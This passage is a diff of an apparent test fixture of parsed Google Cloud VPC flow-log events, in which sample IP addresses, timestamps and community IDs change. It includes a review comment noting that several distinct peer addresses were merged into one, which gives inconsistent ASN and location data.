@@ -15886,8 +15886,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869008900Z", - "original": "{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392053400Z", + "original": 
"{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", "end": "2019-06-14T03:49:52.205089801Z", @@ -15916,17 +15916,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65274, "bytes": 74613, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 745 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:okS/edCC5y2BJIxXO7dhFGGEAo8=", + "community_id": "1:x8d/OIPY4zsghmchjpMb6iKfgGo=", "bytes": 74613, "transport": "tcp", "type": "ipv4", @@ -15940,7 +15940,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -15965,8 +15965,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869012400Z", - "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392057800Z", + "original": 
"{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270996793Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -15995,17 +15995,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 53879, "bytes": 74942, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 726 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RJnXD8bwo6xYMLMKaPN85qjHcdQ=", + "community_id": "1:AkCFUf83/4ycKxpQQkP7p7l9aqs=", "bytes": 74942, "transport": "tcp", "type": "ipv4", @@ -16019,7 +16019,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -16044,8 +16044,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869015500Z", - "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392062300Z", + "original": 
"{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760414869Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -16072,17 +16072,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34450, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:mjrSMbGpta0wXfm0rttjlUEE5S4=", + "community_id": "1:0xYaSZA1hg8djQzHMsHV0LC9xJY=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16096,7 +16096,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -16121,8 +16121,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869018600Z", - "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392066700Z", + "original": 
"{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:47:38.189569840Z", "end": "2019-06-14T03:47:38.299054333Z", @@ -16145,9 +16145,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65274, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16161,7 +16161,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:okS/edCC5y2BJIxXO7dhFGGEAo8=", + "community_id": "1:x8d/OIPY4zsghmchjpMb6iKfgGo=", "bytes": 121593, "transport": "tcp", "type": "ipv4", @@ -16176,7 +16176,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -16200,8 +16200,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869021400Z", - "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392071500Z", + "original": 
"{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270996793Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -16228,17 +16228,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60968, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:FaCnDl7uWc7lOELNsyeufwQIgPc=", + "community_id": "1:E0Auuo+7QQ3cb588odS6yJLxVyU=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -16252,7 +16252,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
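Review bot: Three distinct synthetic peers are collapsed into one address: 203.0.113.58 (`"as": {"number": 33652}`, `dest_location` Broomfield/Colorado) in the hunk at 16145, 203.0.113.27 (`"as": {"number": 15169}`) in the hunk at 16228, and 203.0.113.134 at 16299 all become 67.43.156.13, so the fixture now asserts contradictory ASN and location data for a single IP across events (the same pattern recurs at 16399, 16476, 16559, 16632, 16709 and 17024, and 67.43.156.14 is AS 15169/usa at 16792 but AS 4837/Shangqiu at 16944). Since this file is regenerated from the input fixture, the fix belongs there: give each original address its own value from the supported range (for example `.13`, `.14`, `.15`, keeping one ASN per address) so the events remain distinguishable and the enrichment output stays internally consistent. The replacement addresses are also outside the RFC 5737 documentation ranges (203.0.113.0/24, 198.51.100.0/24), which is presumably deliberate because the test GeoIP data covers them; that rationale is only implied by the diff. The enclosing event objects start and end outside these hunks.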
@@ -16277,8 +16277,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869024400Z", - "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392077100Z", + "original": 
"{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:39.653136947Z", "end": "2019-06-14T03:43:39.777977145Z", @@ -16299,10 +16299,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33530, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16316,7 +16316,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EnH+d3/qmomg2hTDB2XhQfZVi90=", + "community_id": "1:2r+9oNITMpL8veN57VUSy8JQkp0=", "bytes": 177471, "name": "default", "transport": "tcp", @@ -16339,7 +16339,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -16375,8 +16375,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869029500Z", - "original": "{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392082700Z", + "original": 
"{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", "end": "2019-06-14T03:49:52.205194199Z", @@ -16399,9 +16399,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65275, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16415,7 +16415,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HecAvf3EWM638zAmzah9YroP5sc=", + "community_id": "1:pagRMjC+skHhrGE9uXpcDCyM7tk=", "bytes": 53315, "transport": "tcp", "type": "ipv4", @@ -16430,7 +16430,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -16454,8 +16454,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869032500Z", - "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392088300Z", + "original": 
"{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.565734921Z", "end": "2019-06-14T03:49:56.316847800Z", @@ -16476,9 +16476,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34450, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -16492,7 +16492,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:mjrSMbGpta0wXfm0rttjlUEE5S4=", + "community_id": "1:0xYaSZA1hg8djQzHMsHV0LC9xJY=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -16507,7 +16507,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -16531,8 +16531,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869035600Z", - "original": 